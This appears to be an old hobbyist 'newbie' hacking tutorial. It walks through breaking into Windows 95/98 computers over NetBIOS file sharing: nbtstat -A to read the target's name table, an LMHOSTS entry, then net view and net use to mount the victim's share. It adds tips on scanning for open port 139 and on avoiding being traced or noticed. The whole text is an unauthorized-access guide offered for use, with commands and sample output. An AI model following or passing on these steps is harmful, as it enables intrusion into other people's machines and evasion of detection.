First off let me say that you may not find this method the easiest way of hacking, but then again you want to be a hacker right. A lot of hacking is trial and error. The feeling you get when YOU actually break into a system is much more fulfilling than when you run some downloaded proggie. Furthermore , you should be running a firewall when you attempt this hack as otherwise you can be traced. If you need a firewall CLICK HERE. You should attempt this hack (like all others) on yourself first so you know exactly what's going on when you finally get into a system. Spending too much time on a system could arouse suspicion, and lead to getting caught.
There are three requirements for using this method of hacking:
1) You must have nbtstat installed on your computer. Simply open a dos prompt and type nbtstat and you should see a list of commands. If you do not have this installed I’m sure you can find it somewhere on the internet.
2) The target you’re hacking into must be a Windows box. 95 or 98 will work. However, WindowsNT, Windows2000, and other O.S. 's cannot be hacked using this method (as far as I know).
3) The target must have file sharing permissions on. (I will tell you how to check for this further into the hack.)
First you need to obtain the IP address of the target. If you don’t know what this is then you should read my definitions page by CLICKING HERE.
When you type nbtstat /? at a dos prompt you should see the following table:
C:\WINDOWS>nbtstat
Displays protocol statistics and current TCP/IP connections
using NBT(NetBIOS over TCP/IP).
NBTSTAT [-a RemoteName] [-A IP address] [-c] [-n]
[-r] [-R] [-s] [S] [interval] ]
-a
(adapter status) Lists the remote machine's name table given its name
-A
(Adapter status) Lists the remote machine's name table given its
IP address.
-c
(cache) Lists the
remote name cache including the IP addresses
-n
(names) Lists local
NetBIOS names.
-r
(resolved) Lists names resolved by
broadcast and via WINS
-R
(Reload) Purges and reloads
the remote cache name table
-S
(Sessions) Lists sessions table with the
destination IP addresses
-s
(sessions) Lists sessions table converting
destination IP
to names via the hosts file.
RemoteName
Remote host machine name.
IP address
Dotted decimal representation of the IP address.
interval
Redisplays selected statistics, pausing interval seconds
between each display. Press Ctrl+C to stop redisplaying
statistics.
------------------------------------------------------------------------------------------------------------
What we wanna do is locate the table from the IP address, so we'll use option -A (note caps are important). You can figure out other variations of the options on your own later, as this is just meant as an introductory tutorial.
So we type the command with the proper switch and IP address.
Example: nbtstat -A 127.0.0.1
The table that appears should look like this:
--------------------------------------------------------------------------------------------------------------
C:\WINDOWS>nbtstat -A 255.255.255.25
NetBIOS Remote Machine Name Table
Name Type Status
----------------------------------------------
COMPUTER-1 <00> UNIQUE Registered
WORKGROUP <00> GROUP Registered
COMPNAME-1 <03> UNIQUE Registered
COMPNAME-1 <20> UNIQUE Registered
USERNAME <03> UNIQUE Registered
WORKGROUP <1E> GROUP Registered
MAC Address = 44-45-53-54-00-00
--------------------------------------------------------------------------------------------------------------
Ok. See that " <20> " ? That means that the computer has file sharing enabled. Now, what you want to do next is to create a "LMHOSTS" file in your :\windows directory so that you can log into it. To do this we type:
"edit" then space, then the IP address then press the tab key three times then enter the name to the left of the <20>.
Example:
edit 255.255.255.25 COMPNAME-1
When you press enter a blue dos shell box will pop up hit "ALT" then "F" THEN "A" . In the save as box type "LMHOSTS". (Without the quotes.)
In order to access the system you must have file sharing enabled on your system.
To do this open your control panel and double click on the network icon. Under the configuration tab you should see a box that says file sharing click on this and then click "I want to be able to give others access to my files". After choosing "OK" Windows will install a few drivers, then restart.
IMPORTANT NOTE: WHEN YOU ARE DONE HACKING YOU SHOULD GO BACK INTO THE NETWORK SETTINGS AND DISABLE FILE SHARING, OR YOU WILL BE SUSCEPTIBLE TO BEING HACKED BY THIS METHOD!!!!!!!!!
Go to start menu\find\computer and tell it to find
the name that the computer was
labeled. i.e. COMPNAME-1
Or, if you prefer hacking from DOS (as I do) then try typing:
c:\>net view \\[IP address]
u will see a list Choose 1
and then type this:
c:\>net use g: \\[IP address]\[Sharename]
That's about it. I will be adding a few pages below that explain different variations/options that you can play with.
Here's an additional hint:
When using a port scanner to look for IP's that are vulnerable to this attack look for an open port #139, as this is the default port set for file sharing.
This document was written as a newbie text by DIDIT 2-XS. You may
duplicate, copy, or link your site to this page if you want. The link
address to this page is: www.geocities.com/lake327/nbtstat.html.
Please
do not remove my name from this text or take credit for my work. If you
choose to copy this document you should copy it in it's entirety, (including
this paragraph). Have fun, be careful, and remember to KEEP IT
FREE!!!!!!!!